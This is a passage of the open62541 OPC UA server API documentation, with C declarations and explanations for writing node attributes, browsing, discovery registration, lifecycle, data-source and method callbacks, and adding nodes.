&UA_TYPES[UA_TYPES_BOOLEAN], &isAbstract);
}
static UA_INLINE UA_StatusCode
UA_Server_writeInverseName(UA_Server *server, const UA_NodeId nodeId,
const UA_LocalizedText inverseName) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_INVERSENAME,
&UA_TYPES[UA_TYPES_LOCALIZEDTEXT], &inverseName);
}
static UA_INLINE UA_StatusCode
UA_Server_writeEventNotifier(UA_Server *server, const UA_NodeId nodeId,
const UA_Byte eventNotifier) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_EVENTNOTIFIER,
&UA_TYPES[UA_TYPES_BYTE], &eventNotifier);
}
static UA_INLINE UA_StatusCode
UA_Server_writeValue(UA_Server *server, const UA_NodeId nodeId,
const UA_Variant value) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_VALUE,
&UA_TYPES[UA_TYPES_VARIANT], &value);
}
static UA_INLINE UA_StatusCode
UA_Server_writeDataType(UA_Server *server, const UA_NodeId nodeId,
const UA_NodeId dataType) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_DATATYPE,
&UA_TYPES[UA_TYPES_NODEID], &dataType);
}
static UA_INLINE UA_StatusCode
UA_Server_writeValueRank(UA_Server *server, const UA_NodeId nodeId,
const UA_Int32 valueRank) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_VALUERANK,
&UA_TYPES[UA_TYPES_INT32], &valueRank);
}
static UA_INLINE UA_StatusCode
UA_Server_writeArrayDimensions(UA_Server *server, const UA_NodeId nodeId,
const UA_Variant arrayDimensions) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_ARRAYDIMENSIONS,
&UA_TYPES[UA_TYPES_VARIANT], &arrayDimensions);
}
static UA_INLINE UA_StatusCode
UA_Server_writeAccessLevel(UA_Server *server, const UA_NodeId nodeId,
const UA_Byte accessLevel) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_ACCESSLEVEL,
&UA_TYPES[UA_TYPES_BYTE], &accessLevel);
}
static UA_INLINE UA_StatusCode
UA_Server_writeMinimumSamplingInterval(UA_Server *server, const UA_NodeId nodeId,
const UA_Double miniumSamplingInterval) {
return __UA_Server_write(server, &nodeId,
UA_ATTRIBUTEID_MINIMUMSAMPLINGINTERVAL,
&UA_TYPES[UA_TYPES_DOUBLE],
&miniumSamplingInterval);
}
static UA_INLINE UA_StatusCode
UA_Server_writeHistorizing(UA_Server *server, const UA_NodeId nodeId,
const UA_Boolean historizing) {
return __UA_Server_write(server, &nodeId,
UA_ATTRIBUTEID_HISTORIZING,
&UA_TYPES[UA_TYPES_BOOLEAN],
&historizing);
}
static UA_INLINE UA_StatusCode
UA_Server_writeExecutable(UA_Server *server, const UA_NodeId nodeId,
const UA_Boolean executable) {
return __UA_Server_write(server, &nodeId, UA_ATTRIBUTEID_EXECUTABLE,
&UA_TYPES[UA_TYPES_BOOLEAN], &executable); }
Browsing
--------
.. code-block:: c
/* Browse the references of a particular node. See the definition of
* BrowseDescription structure for details. */
UA_BrowseResult
UA_Server_browse(UA_Server *server, UA_UInt32 maxReferences,
const UA_BrowseDescription *bd);
UA_BrowseResult
UA_Server_browseNext(UA_Server *server, UA_Boolean releaseContinuationPoint,
const UA_ByteString *continuationPoint);
/* Nonstandard version of the browse service that recurses into child nodes.
* Possible loops (that can occur for non-hierarchical references) are handled
* by adding every target node at most once to the results array. */
UA_StatusCode
UA_Server_browseRecursive(UA_Server *server, const UA_BrowseDescription *bd,
size_t *resultsSize, UA_ExpandedNodeId **results);
UA_BrowsePathResult
UA_Server_translateBrowsePathToNodeIds(UA_Server *server,
const UA_BrowsePath *browsePath);
/* A simplified TranslateBrowsePathsToNodeIds based on the
* SimpleAttributeOperand type (Part 4, 7.4.4.5).
*
* This specifies a relative path using a list of BrowseNames instead of the
* RelativePath structure. The list of BrowseNames is equivalent to a
* RelativePath that specifies forward references which are subtypes of the
* HierarchicalReferences ReferenceType. All Nodes followed by the browsePath
* shall be of the NodeClass Object or Variable. */
UA_BrowsePathResult
UA_Server_browseSimplifiedBrowsePath(UA_Server *server, const UA_NodeId origin,
size_t browsePathSize,
const UA_QualifiedName *browsePath);
#ifndef HAVE_NODEITER_CALLBACK
#define HAVE_NODEITER_CALLBACK
/* Iterate over all nodes referenced by parentNodeId by calling the callback
* function for each child node (in ifdef because GCC/CLANG handle include order
* differently) */
typedef UA_StatusCode
(*UA_NodeIteratorCallback)(UA_NodeId childId, UA_Boolean isInverse,
UA_NodeId referenceTypeId, void *handle);
#endif
UA_StatusCode
UA_Server_forEachChildNodeCall(UA_Server *server, UA_NodeId parentNodeId,
UA_NodeIteratorCallback callback, void *handle);
#ifdef UA_ENABLE_DISCOVERY
Discovery
---------
.. code-block:: c
/* Register the given server instance at the discovery server.
* This should be called periodically.
* The semaphoreFilePath is optional. If the given file is deleted,
* the server will automatically be unregistered. This could be
* for example a pid file which is deleted if the server crashes.
*
* When the server shuts down you need to call unregister.
*
* @param server
* @param client the client which is used to call the RegisterServer. It must
* already be connected to the correct endpoint
* @param semaphoreFilePath optional parameter pointing to semaphore file. */
UA_StatusCode
UA_Server_register_discovery(UA_Server *server, struct UA_Client *client,
const char* semaphoreFilePath);
/* Unregister the given server instance from the discovery server.
* This should only be called when the server is shutting down.
* @param server
* @param client the client which is used to call the RegisterServer. It must
* already be connected to the correct endpoint */
UA_StatusCode
UA_Server_unregister_discovery(UA_Server *server, struct UA_Client *client);
/* Adds a periodic callback to register the server with the LDS (local discovery server)
* periodically. The interval between each register call is given as second parameter.
* It should be 10 minutes by default (= 10*60*1000).
*
* The delayFirstRegisterMs parameter indicates the delay for the first register call.
* If it is 0, the first register call will be after intervalMs milliseconds,
* otherwise the server's first register will be after delayFirstRegisterMs.
*
* When you manually unregister the server, you also need to cancel the
* periodic callback, otherwise it will be automatically be registered again.
*
* If you call this method multiple times for the same discoveryServerUrl, the older
* periodic callback will be removed.
*
* @param server
* @param client the client which is used to call the RegisterServer.
* It must not yet be connected and will be connected for every register call
* to the given discoveryServerUrl.
* @param discoveryServerUrl where this server should register itself.
* The string will be copied internally. Therefore you can free it after calling this method.
* @param intervalMs
* @param delayFirstRegisterMs
* @param periodicCallbackId */
UA_StatusCode
UA_Server_addPeriodicServerRegisterCallback(UA_Server *server, struct UA_Client *client,
const char* discoveryServerUrl,
UA_Double intervalMs,
UA_Double delayFirstRegisterMs,
UA_UInt64 *periodicCallbackId);
/* Callback for RegisterServer. Data is passed from the register call */
typedef void (*UA_Server_registerServerCallback)(const UA_RegisteredServer *registeredServer,
void* data);
/* Set the callback which is called if another server registeres or unregisters
* with this instance. This callback is called every time the server gets a register
* call. This especially means that for every periodic server register the callback will
* be called.
*
* @param server
* @param cb the callback
* @param data data passed to the callback
* @return UA_STATUSCODE_SUCCESS on success */
void
UA_Server_setRegisterServerCallback(UA_Server *server, UA_Server_registerServerCallback cb,
void* data);
#ifdef UA_ENABLE_DISCOVERY_MULTICAST
/* Callback for server detected through mDNS. Data is passed from the register
* call
*
* @param isServerAnnounce indicates if the server has just been detected. If
* set to false, this means the server is shutting down.
* @param isTxtReceived indicates if we already received the corresponding TXT
* record with the path and caps data */
typedef void (*UA_Server_serverOnNetworkCallback)(const UA_ServerOnNetwork *serverOnNetwork,
UA_Boolean isServerAnnounce,
UA_Boolean isTxtReceived, void* data);
/* Set the callback which is called if another server is found through mDNS or
* deleted. It will be called for any mDNS message from the remote server, thus
* it may be called multiple times for the same instance. Also the SRV and TXT
* records may arrive later, therefore for the first call the server
* capabilities may not be set yet. If called multiple times, previous data will
* be overwritten.
*
* @param server
* @param cb the callback
* @param data data passed to the callback
* @return UA_STATUSCODE_SUCCESS on success */
void
UA_Server_setServerOnNetworkCallback(UA_Server *server,
UA_Server_serverOnNetworkCallback cb,
void* data);
#endif /* UA_ENABLE_DISCOVERY_MULTICAST */
#endif /* UA_ENABLE_DISCOVERY */
Information Model Callbacks
---------------------------
There are three places where a callback from an information model to
user-defined code can happen.
- Custom node constructors and destructors
- Linking VariableNodes with an external data source
- MethodNode callbacks
.. _node-lifecycle:
Node Lifecycle: Constructors, Destructors and Node Contexts
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
To finalize the instantiation of a node, a (user-defined) constructor
callback is executed. There can be both a global constructor for all nodes
and node-type constructor specific to the TypeDefinition of the new node
(attached to an ObjectTypeNode or VariableTypeNode).
In the hierarchy of ObjectTypes and VariableTypes, only the constructor of
the (lowest) type defined for the new node is executed. Note that every
Object and Variable can have only one ``isTypeOf`` reference. But type-nodes
can technically have several ``hasSubType`` references to implement multiple
inheritance. Issues of (multiple) inheritance in the constructor need to be
solved by the user.
When a node is destroyed, the node-type destructor is called before the
global destructor. So the overall node lifecycle is as follows:
1. Global Constructor (set in the server config)
2. Node-Type Constructor (for VariableType or ObjectTypes)
3. (Usage-period of the Node)
4. Node-Type Destructor
5. Global Destructor
The constructor and destructor callbacks can be set to ``NULL`` and are not
used in that case. If the node-type constructor fails, the global destructor
will be called before removing the node. The destructors are assumed to never
fail.
Every node carries a user-context and a constructor-context pointer. The
user-context is used to attach custom data to a node. But the (user-defined)
constructors and destructors may replace the user-context pointer if they
wish to do so. The initial value for the constructor-context is ``NULL``.
When the ``AddNodes`` service is used over the network, the user-context
pointer of the new node is also initially set to ``NULL``.
.. code-block:: c
/* To be set in the server config. */
typedef struct {
/* Can be NULL. May replace the nodeContext */
UA_StatusCode (*constructor)(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *nodeId, void **nodeContext);
/* Can be NULL. The context cannot be replaced since the node is destroyed
* immediately afterwards anyway. */
void (*destructor)(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *nodeId, void *nodeContext);
/* Can be NULL. Called during recursive node instantiation. While mandatory
* child nodes are automatically created if not already present, optional child
* nodes are not. This callback can be used to define whether an optional child
* node should be created.
*
* @param server The server executing the callback
* @param sessionId The identifier of the session
* @param sessionContext Additional data attached to the session in the
* access control layer
* @param sourceNodeId Source node from the type definition. If the new node
* shall be created, it will be a copy of this node.
* @param targetParentNodeId Parent of the potential new child node
* @param referenceTypeId Identifies the reference type which that the parent
* node has to the new node.
* @return Return UA_TRUE if the child node shall be instantiatet,
* UA_FALSE otherwise. */
UA_Boolean (*createOptionalChild)(UA_Server *server,
const UA_NodeId *sessionId,
void *sessionContext,
const UA_NodeId *sourceNodeId,
const UA_NodeId *targetParentNodeId,
const UA_NodeId *referenceTypeId);
/* Can be NULL. Called when a node is to be copied during recursive
* node instantiation. Allows definition of the NodeId for the new node.
* If the callback is set to NULL or the resulting NodeId is UA_NODEID_NULL,
* then a random NodeId will be generated.
*
* @param server The server executing the callback
* @param sessionId The identifier of the session
* @param sessionContext Additional data attached to the session in the
* access control layer
* @param sourceNodeId Source node of the copy operation
* @param targetParentNodeId Parent node of the new node
* @param referenceTypeId Identifies the reference type which that the parent
* node has to the new node. */
UA_StatusCode (*generateChildNodeId)(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *sourceNodeId,
const UA_NodeId *targetParentNodeId,
const UA_NodeId *referenceTypeId,
UA_NodeId *targetNodeId);
} UA_GlobalNodeLifecycle;
typedef struct {
/* Can be NULL. May replace the nodeContext */
UA_StatusCode (*constructor)(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *typeNodeId, void *typeNodeContext,
const UA_NodeId *nodeId, void **nodeContext);
/* Can be NULL. May replace the nodeContext. */
void (*destructor)(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *typeNodeId, void *typeNodeContext,
const UA_NodeId *nodeId, void **nodeContext);
} UA_NodeTypeLifecycle;
UA_StatusCode
UA_Server_setNodeTypeLifecycle(UA_Server *server, UA_NodeId nodeId,
UA_NodeTypeLifecycle lifecycle);
UA_StatusCode
UA_Server_getNodeContext(UA_Server *server, UA_NodeId nodeId,
void **nodeContext);
/* Careful! The user has to ensure that the destructor callbacks still work. */
UA_StatusCode
UA_Server_setNodeContext(UA_Server *server, UA_NodeId nodeId,
void *nodeContext);
.. _datasource:
Data Source Callback
^^^^^^^^^^^^^^^^^^^^
The server has a unique way of dealing with the content of variables. Instead
of storing a variant attached to the variable node, the node can point to a
function with a local data provider. Whenever the value attribute is read,
the function will be called and asked to provide a UA_DataValue return value
that contains the value content and additional timestamps.
It is expected that the read callback is implemented. The write callback can
be set to a null-pointer.
.. code-block:: c
typedef struct {
/* Copies the data from the source into the provided value.
*
* !! ZERO-COPY OPERATIONS POSSIBLE !!
* It is not required to return a copy of the actual content data. You can
* return a pointer to memory owned by the user. Memory can be reused
* between read callbacks of a DataSource, as the result is already encoded
* on the network buffer between each read operation.
*
* To use zero-copy reads, set the value of the `value->value` Variant
* without copying, e.g. with `UA_Variant_setScalar`. Then, also set
* `value->value.storageType` to `UA_VARIANT_DATA_NODELETE` to prevent the
* memory being cleaned up. Don't forget to also set `value->hasValue` to
* true to indicate the presence of a value.
*
* @param server The server executing the callback
* @param sessionId The identifier of the session
* @param sessionContext Additional data attached to the session in the
* access control layer
* @param nodeId The identifier of the node being read from
* @param nodeContext Additional data attached to the node by the user
* @param includeSourceTimeStamp If true, then the datasource is expected to
* set the source timestamp in the returned value
* @param range If not null, then the datasource shall return only a
* selection of the (nonscalar) data. Set
* UA_STATUSCODE_BADINDEXRANGEINVALID in the value if this does not
* apply
* @param value The (non-null) DataValue that is returned to the client. The
* data source sets the read data, the result status and optionally a
* sourcetimestamp.
* @return Returns a status code for logging. Error codes intended for the
* original caller are set in the value. If an error is returned,
* then no releasing of the value is done
*/
UA_StatusCode (*read)(UA_Server *server, const UA_NodeId *sessionId,
void *sessionContext, const UA_NodeId *nodeId,
void *nodeContext, UA_Boolean includeSourceTimeStamp,
const UA_NumericRange *range, UA_DataValue *value);
/* Write into a data source. This method pointer can be NULL if the
* operation is unsupported.
*
* @param server The server executing the callback
* @param sessionId The identifier of the session
* @param sessionContext Additional data attached to the session in the
* access control layer
* @param nodeId The identifier of the node being written to
* @param nodeContext Additional data attached to the node by the user
* @param range If not NULL, then the datasource shall return only a
* selection of the (nonscalar) data. Set
* UA_STATUSCODE_BADINDEXRANGEINVALID in the value if this does not
* apply
* @param value The (non-NULL) DataValue that has been written by the client.
* The data source contains the written data, the result status and
* optionally a sourcetimestamp
* @return Returns a status code for logging. Error codes intended for the
* original caller are set in the value. If an error is returned,
* then no releasing of the value is done
*/
UA_StatusCode (*write)(UA_Server *server, const UA_NodeId *sessionId,
void *sessionContext, const UA_NodeId *nodeId,
void *nodeContext, const UA_NumericRange *range,
const UA_DataValue *value);
} UA_DataSource;
UA_StatusCode
UA_Server_setVariableNode_dataSource(UA_Server *server, const UA_NodeId nodeId,
const UA_DataSource dataSource);
.. _value-callback:
Value Callback
^^^^^^^^^^^^^^
Value Callbacks can be attached to variable and variable type nodes. If
not ``NULL``, they are called before reading and after writing respectively.
.. code-block:: c
typedef struct {
/* Called before the value attribute is read. It is possible to write into the
* value attribute during onRead (using the write service). The node is
* re-opened afterwards so that changes are considered in the following read
* operation.
*
* @param handle Points to user-provided data for the callback.
* @param nodeid The identifier of the node.
* @param data Points to the current node value.
* @param range Points to the numeric range the client wants to read from
* (or NULL). */
void (*onRead)(UA_Server *server, const UA_NodeId *sessionId,
void *sessionContext, const UA_NodeId *nodeid,
void *nodeContext, const UA_NumericRange *range,
const UA_DataValue *value);
/* Called after writing the value attribute. The node is re-opened after
* writing so that the new value is visible in the callback.
*
* @param server The server executing the callback
* @sessionId The identifier of the session
* @sessionContext Additional data attached to the session
* in the access control layer
* @param nodeid The identifier of the node.
* @param nodeUserContext Additional data attached to the node by
* the user.
* @param nodeConstructorContext Additional data attached to the node
* by the type constructor(s).
* @param range Points to the numeric range the client wants to write to (or
* NULL). */
void (*onWrite)(UA_Server *server, const UA_NodeId *sessionId,
void *sessionContext, const UA_NodeId *nodeId,
void *nodeContext, const UA_NumericRange *range,
const UA_DataValue *data);
} UA_ValueCallback;
UA_StatusCode
UA_Server_setVariableNode_valueCallback(UA_Server *server,
const UA_NodeId nodeId,
const UA_ValueCallback callback);
.. _local-monitoreditems:
Local MonitoredItems
^^^^^^^^^^^^^^^^^^^^
MonitoredItems are used with the Subscription mechanism of OPC UA to
transported notifications for data changes and events. MonitoredItems can
also be registered locally. Notifications are then forwarded to a
user-defined callback instead of a remote client.
.. code-block:: c
#ifdef UA_ENABLE_SUBSCRIPTIONS
typedef void (*UA_Server_DataChangeNotificationCallback)
(UA_Server *server, UA_UInt32 monitoredItemId, void *monitoredItemContext,
const UA_NodeId *nodeId, void *nodeContext, UA_UInt32 attributeId,
const UA_DataValue *value);
typedef void (*UA_Server_EventNotificationCallback)
(UA_Server *server, UA_UInt32 monId, void *monContext,
size_t nEventFields, const UA_Variant *eventFields);
/* Create a local MonitoredItem with a sampling interval that detects data
* changes.
*
* @param server The server executing the MonitoredItem
* @timestampsToReturn Shall timestamps be added to the value for the callback?
* @item The parameters of the new MonitoredItem. Note that the attribute of the
* ReadValueId (the node that is monitored) can not be
* ``UA_ATTRIBUTEID_EVENTNOTIFIER``. A different callback type needs to be
* registered for event notifications.
* @monitoredItemContext A pointer that is forwarded with the callback
* @callback The callback that is executed on detected data changes
*
* @return Returns a description of the created MonitoredItem. The structure
* also contains a StatusCode (in case of an error) and the identifier of the
* new MonitoredItem. */
UA_MonitoredItemCreateResult
UA_Server_createDataChangeMonitoredItem(UA_Server *server,
UA_TimestampsToReturn timestampsToReturn,
const UA_MonitoredItemCreateRequest item,
void *monitoredItemContext,
UA_Server_DataChangeNotificationCallback callback);
/* UA_MonitoredItemCreateResult */
/* UA_Server_createEventMonitoredItem(UA_Server *server, */
/* UA_TimestampsToReturn timestampsToReturn, */
/* const UA_MonitoredItemCreateRequest item, void *context, */
/* UA_Server_EventNotificationCallback callback); */
UA_StatusCode
UA_Server_deleteMonitoredItem(UA_Server *server, UA_UInt32 monitoredItemId);
#endif
Method Callbacks
^^^^^^^^^^^^^^^^
Method callbacks are set to `NULL` (not executable) when a method node is
added over the network. In theory, it is possible to add a callback via
``UA_Server_setMethodNode_callback`` within the global constructor when
adding methods over the network is really wanted. See the Section
:ref:`object-interaction` for calling methods on an object.
.. code-block:: c
typedef UA_StatusCode
(*UA_MethodCallback)(UA_Server *server, const UA_NodeId *sessionId,
void *sessionContext, const UA_NodeId *methodId,
void *methodContext, const UA_NodeId *objectId,
void *objectContext, size_t inputSize,
const UA_Variant *input, size_t outputSize,
UA_Variant *output);
#ifdef UA_ENABLE_METHODCALLS
UA_StatusCode
UA_Server_setMethodNode_callback(UA_Server *server,
const UA_NodeId methodNodeId,
UA_MethodCallback methodCallback);
#endif
.. _object-interaction:
Interacting with Objects
------------------------
Objects in the information model are represented as ObjectNodes. Some
convenience functions are provided to simplify the interaction with objects.
.. code-block:: c
/* Write an object property. The property is represented as a VariableNode with
* a ``HasProperty`` reference from the ObjectNode. The VariableNode is
* identified by its BrowseName. Writing the property sets the value attribute
* of the VariableNode.
*
* @param server The server object
* @param objectId The identifier of the object (node)
* @param propertyName The name of the property
* @param value The value to be set for the event attribute
* @return The StatusCode for setting the event attribute */
UA_StatusCode
UA_Server_writeObjectProperty(UA_Server *server, const UA_NodeId objectId,
const UA_QualifiedName propertyName,
const UA_Variant value);
/* Directly point to the scalar value instead of a variant */
UA_StatusCode
UA_Server_writeObjectProperty_scalar(UA_Server *server, const UA_NodeId objectId,
const UA_QualifiedName propertyName,
const void *value, const UA_DataType *type);
/* Read an object property.
*
* @param server The server object
* @param objectId The identifier of the object (node)
* @param propertyName The name of the property
* @param value Contains the property value after reading. Must not be NULL.
* @return The StatusCode for setting the event attribute */
UA_StatusCode
UA_Server_readObjectProperty(UA_Server *server, const UA_NodeId objectId,
const UA_QualifiedName propertyName,
UA_Variant *value);
#ifdef UA_ENABLE_METHODCALLS
UA_CallMethodResult
UA_Server_call(UA_Server *server, const UA_CallMethodRequest *request);
#endif
.. _addnodes:
Node Addition and Deletion
--------------------------
When creating dynamic node instances at runtime, chances are that you will
not care about the specific NodeId of the new node, as long as you can
reference it later. When passing numeric NodeIds with a numeric identifier 0,
the stack evaluates this as "select a random unassigned numeric NodeId in
that namespace". To find out which NodeId was actually assigned to the new
node, you may pass a pointer `outNewNodeId`, which will (after a successful
node insertion) contain the nodeId of the new node. You may also pass a
``NULL`` pointer if this result is not needed.
See the Section :ref:`node-lifecycle` on constructors and on attaching
user-defined data to nodes.
The methods for node addition and deletion take mostly const arguments that
are not modified. When creating a node, a deep copy of the node identifier,
node attributes, etc. is created. Therefore, it is possible to call for
example ``UA_Server_addVariablenode`` with a value attribute (a
:ref:`variant`) pointing to a memory location on the stack. If you need
changes to a variable value to manifest at a specific memory location, please
use a :ref:`datasource` or a :ref:`value-callback`.
.. code-block:: c
/* Protect against redundant definitions for server/client */
#ifndef UA_DEFAULT_ATTRIBUTES_DEFINED
#define UA_DEFAULT_ATTRIBUTES_DEFINED
/* The default for variables is "BaseDataType" for the datatype, -2 for the
* valuerank and a read-accesslevel. */
extern const UA_VariableAttributes UA_VariableAttributes_default;
extern const UA_VariableTypeAttributes UA_VariableTypeAttributes_default;
/* Methods are executable by default */
extern const UA_MethodAttributes UA_MethodAttributes_default;
/* The remaining attribute definitions are currently all zeroed out */
extern const UA_ObjectAttributes UA_ObjectAttributes_default;
extern const UA_ObjectTypeAttributes UA_ObjectTypeAttributes_default;
extern const UA_ReferenceTypeAttributes UA_ReferenceTypeAttributes_default;
extern const UA_DataTypeAttributes UA_DataTypeAttributes_default;
extern const UA_ViewAttributes UA_ViewAttributes_default;
#endif
/* Don't use this function. There are typed versions as inline functions. */
UA_StatusCode
__UA_Server_addNode(UA_Server *server, const UA_NodeClass nodeClass,
const UA_NodeId *requestedNewNodeId,
const UA_NodeId *parentNodeId,
const UA_NodeId *referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId *typeDefinition,
const UA_NodeAttributes *attr,
const UA_DataType *attributeType,
void *nodeContext, UA_NodeId *outNewNodeId);
static UA_INLINE UA_StatusCode
UA_Server_addVariableNode(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId typeDefinition,
const UA_VariableAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_VARIABLE, &requestedNewNodeId,
&parentNodeId, &referenceTypeId, browseName,
&typeDefinition, (const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_VARIABLEATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addVariableTypeNode(UA_Server *server,
const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId typeDefinition,
const UA_VariableTypeAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_VARIABLETYPE,
&requestedNewNodeId, &parentNodeId, &referenceTypeId,
browseName, &typeDefinition,
(const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_VARIABLETYPEATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addObjectNode(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId typeDefinition,
const UA_ObjectAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_OBJECT, &requestedNewNodeId,
&parentNodeId, &referenceTypeId, browseName,
&typeDefinition, (const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_OBJECTATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addObjectTypeNode(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_ObjectTypeAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_OBJECTTYPE, &requestedNewNodeId,
&parentNodeId, &referenceTypeId, browseName,
&UA_NODEID_NULL, (const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_OBJECTTYPEATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addViewNode(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_ViewAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_VIEW, &requestedNewNodeId,
&parentNodeId, &referenceTypeId, browseName,
&UA_NODEID_NULL, (const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_VIEWATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addReferenceTypeNode(UA_Server *server,
const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_ReferenceTypeAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_REFERENCETYPE,
&requestedNewNodeId, &parentNodeId, &referenceTypeId,
browseName, &UA_NODEID_NULL,
(const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_REFERENCETYPEATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addDataTypeNode(UA_Server *server,
const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_DataTypeAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_DATATYPE, &requestedNewNodeId,
&parentNodeId, &referenceTypeId, browseName,
&UA_NODEID_NULL, (const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_DATATYPEATTRIBUTES],
nodeContext, outNewNodeId);
}
UA_StatusCode
UA_Server_addDataSourceVariableNode(UA_Server *server,
const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId typeDefinition,
const UA_VariableAttributes attr,
const UA_DataSource dataSource,
void *nodeContext, UA_NodeId *outNewNodeId);
#ifdef UA_ENABLE_METHODCALLS
UA_StatusCode
UA_Server_addMethodNodeEx(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_MethodAttributes attr, UA_MethodCallback method,
size_t inputArgumentsSize, const UA_Argument *inputArguments,
const UA_NodeId inputArgumentsRequestedNewNodeId,
UA_NodeId *inputArgumentsOutNewNodeId,
size_t outputArgumentsSize, const UA_Argument *outputArguments,
const UA_NodeId outputArgumentsRequestedNewNodeId,
UA_NodeId *outputArgumentsOutNewNodeId,
void *nodeContext, UA_NodeId *outNewNodeId);
static UA_INLINE UA_StatusCode
UA_Server_addMethodNode(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId, const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName, const UA_MethodAttributes attr,
UA_MethodCallback method,
size_t inputArgumentsSize, const UA_Argument *inputArguments,
size_t outputArgumentsSize, const UA_Argument *outputArguments,
void *nodeContext, UA_NodeId *outNewNodeId) {
return UA_Server_addMethodNodeEx(server, requestedNewNodeId, parentNodeId,
referenceTypeId, browseName, attr, method,
inputArgumentsSize, inputArguments, UA_NODEID_NULL, NULL,
outputArgumentsSize, outputArguments, UA_NODEID_NULL, NULL,
nodeContext, outNewNodeId);
}
#endif
The method pair UA_Server_addNode_begin and _finish splits the AddNodes
service in two parts. This is useful if the node shall be modified before
finish the instantiation. For example to add children with specific NodeIds.
Otherwise, mandatory children (e.g. of an ObjectType) are added with
pseudo-random unique NodeIds. Existing children are detected during the
_finish part via their matching BrowseName.
The _begin method:
- prepares the node and adds it to the nodestore
- copies some unassigned attributes from the TypeDefinition node internally
- adds the references to the parent (and the TypeDefinition if applicable)
- performs type-checking of variables.
You can add an object node without a parent if you set the parentNodeId and
referenceTypeId to UA_NODE_ID_NULL. Then you need to add the parent reference
and hasTypeDef reference yourself before calling the _finish method.
Not that this is only allowed for object nodes.
The _finish method:
- copies mandatory children
- calls the node constructor(s) at the end
- may remove the node if it encounters an error.
The special UA_Server_addMethodNode_finish method needs to be used for
method nodes, since there you need to explicitly specifiy the input
and output arguments which are added in the finish step (if not yet already there)
``VariableAttributes`` for variables, ``ObjectAttributes`` for objects, and
so on. Missing attributes are taken from the TypeDefinition node if
applicable.
.. code-block:: c
UA_StatusCode
UA_Server_addNode_begin(UA_Server *server, const UA_NodeClass nodeClass,
const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId typeDefinition,
const void *attr, const UA_DataType *attributeType,
void *nodeContext, UA_NodeId *outNewNodeId);
UA_StatusCode
UA_Server_addNode_finish(UA_Server *server, const UA_NodeId nodeId);
#ifdef UA_ENABLE_METHODCALLS
UA_StatusCode
UA_Server_addMethodNode_finish(UA_Server *server, const UA_NodeId nodeId,
UA_MethodCallback method,
size_t inputArgumentsSize, const UA_Argument* inputArguments,
